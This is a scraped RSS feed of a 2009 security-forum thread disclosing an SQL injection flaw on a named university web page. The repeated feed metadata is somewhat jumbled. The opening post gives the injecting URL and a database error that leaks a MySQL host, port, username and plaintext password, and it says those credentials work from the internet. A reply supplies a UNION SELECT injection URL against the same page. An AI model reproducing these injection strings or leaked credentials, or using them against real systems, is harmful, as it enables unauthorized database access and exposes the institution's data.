princeton.edu SQL injection/SQL username:password http://wws.princeton.edu/webmedia/list_speakers.xml?start=f' generates the error: RXML run error: Query failed:[...] <emit host="mysql://wws_web:WW$W3bUs3r@www-01dept.princeton.edu:3308/wws_webcasts"[...] www-01dept.princeton.edu:3308 is connectable from the internet, and the user:password works. Is this like a major issue since it's a well known school? http://sla.ckers.org/forum/read.php?3,28306,28306#msg-28306 Sun, 26 May 2013 00:53:19 -0500 Phorum 5.2.15a http://sla.ckers.org/forum/read.php?3,28306,28347#msg-28347 Re: princeton.edu SQL injection/SQL username:password http://sla.ckers.org/forum/read.php?3,28306,28347#msg-28347 thrill Full Disclosure Mon, 25 May 2009 01:20:25 -0500 http://sla.ckers.org/forum/read.php?3,28306,28346#msg-28346 Re: princeton.edu SQL injection/SQL username:password http://sla.ckers.org/forum/read.php?3,28306,28346#msg-28346 PaPPy Full Disclosure Sun, 24 May 2009 23:52:50 -0500 http://sla.ckers.org/forum/read.php?3,28306,28345#msg-28345 Re: princeton.edu SQL injection/SQL username:password http://sla.ckers.org/forum/read.php?3,28306,28345#msg-28345 thrill Full Disclosure Sun, 24 May 2009 23:45:01 -0500 http://sla.ckers.org/forum/read.php?3,28306,28344#msg-28344 Re: princeton.edu SQL injection/SQL username:password http://sla.ckers.org/forum/read.php?3,28306,28344#msg-28344 PaPPy Full Disclosure Sun, 24 May 2009 22:12:44 -0500 http://sla.ckers.org/forum/read.php?3,28306,28343#msg-28343 Re: princeton.edu SQL injection/SQL username:password http://sla.ckers.org/forum/read.php?3,28306,28343#msg-28343 wireghoul Full Disclosure Sun, 24 May 2009 20:42:38 -0500 http://sla.ckers.org/forum/read.php?3,28306,28308#msg-28308 Re: princeton.edu SQL injection/SQL username:password http://sla.ckers.org/forum/read.php?3,28306,28308#msg-28308
http://wws.princeton.edu/webmedia/list_speakers.xml?start=f%27%20OR%201=0%20UNION%20SELECT%201--%20-]]> Kyo Full Disclosure Sat, 23 May 2009 11:22:31 -0500 http://sla.ckers.org/forum/read.php?3,28306,28306#msg-28306 princeton.edu SQL injection/SQL username:password http://sla.ckers.org/forum/read.php?3,28306,28306#msg-28306
generates the error:
RXML run error: Query failed:[...] <emit host="mysql://wws_web:WW$W3bUs3r@www-01dept.princeton.edu:3308/wws_webcasts"[...]

www-01dept.princeton.edu:3308 is connectable from the internet, and the user:password works.

Is this like a major issue since it's a well known school?]]> DanielG Full Disclosure Sat, 23 May 2009 09:10:00 -0500